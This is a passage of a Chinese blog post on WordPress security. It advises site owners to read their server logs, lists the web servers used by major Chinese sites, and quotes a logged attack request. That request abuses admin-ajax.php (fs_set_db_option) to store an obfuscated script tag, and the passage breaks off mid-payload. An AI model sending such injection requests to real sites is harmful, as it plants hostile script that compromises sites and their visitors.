如果浏览不顺畅请到原文章出处:https://www.sky8g.com/technology/2947/
请注意可能会提示风险,这是csdn官网如果不是他们的网址,其他的网址都会提示有风险,这是CSDN网站设置的问题,本网站全部文章为免费技术分享,请放心访问,无需担心。
原文章出处:https://www.sky8g.com/technology/2947/
此篇文章是由SKY8G网作者原创,禁止抄袭。
作为博客、论坛、或者电商网站等的博主,相信大家都知道, wordpress是世界上创建网站最简单的平台,他有及其丰富的插件功能。让你的网站运行效率更加完善。但是这样多的个人用户或者商家使用它,必然给黑客带来了很好的研究对象,这样就让黑客更加专注于对你的wordpree网站进行恶意的访问和分析你网站的漏洞。目的是为了获取你的用户信息,或者获取你用户信用卡信息,这是非常可怕的事情。那么我 们如何使我们的网站更加安全呢?
此篇文章是由SKY8G网作者进行编辑,禁止抄袭,违者必究
WordPress网站分析漏洞
首先,我们一定要养成常看网站日志的习惯,这样可以及时发现漏洞避免不必要的损失。一般情况我们所使用的web服务器通常为三种。
- 第一种是Apache服务器。
- 第二种是Nginx服务器。
- 第三种是大型公司自己的开发服务器,例如
1
2
3
4
5
6
7
8
9
10
11
12
13
今天收集了几个大网站所使用的web服务器,每个网站都使用几种web服务器,有的是开源的有的是自己开发的。
网站 url Server
谷歌 http://www.google.com.hk/ gws,sffe
百度 http://www.baidu.com/ BWS/1.0,Apache
新浪 http://www.sina.com.cn/ Apache,MediaV/0.1.54,nginx
搜狐 http://www.sohu.com/ Apache/2.2.4,SWS,nginx
网易 http://www.163.com/ nginx,Apache/2.0
腾讯 http://www.qq.com/ squid/3.0,cws/3.1
淘宝 http://www.taobao.com/ Tengine,Apache,nginx
京东 http://www.360buy.com/ JDWS,Apache
雅虎 http://cn.yahoo.com/ YTS/1.16.0
图都 http://www.tudou.com/ tws0.3,nginx/0.7.59
迅雷 http://www.xunlei.com/ nginx/0.7.69
当然再好的服务器也不一定没有漏洞,所以网站的安全至关重要。查看网站的访问日志、错误日志、ssh登录失败日志登录,经常查看。这里不再介绍如何查看日志,自己可以通过百度和谷歌进行查阅。
WordPress网站发现漏洞
只要我们勤于看日志,总结分析日志通常会使网站健康安全运行。当然如果你不是专业的运维人员或DBA的话也不一定做到每天观看日志,对于我来说就不能天天看日志了。今天我突然查看了日志,讲过查看访问本网站的IP有一个恶意的访问,并且试图破坏我的网站,如下:
1 2 |
访问的时间和访问的url xxx.xxx.xxx.xxx - - "GET //wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=fonts&option_value=<script async=true type=text/javascript language=javascript>var nt = String.fromCharCode(57);var mb = String.fromCharCode(97, 106, 97, 120, 67, 111, 117, 110, 116, 101, 114);var sb = String.fromCharCode(115 |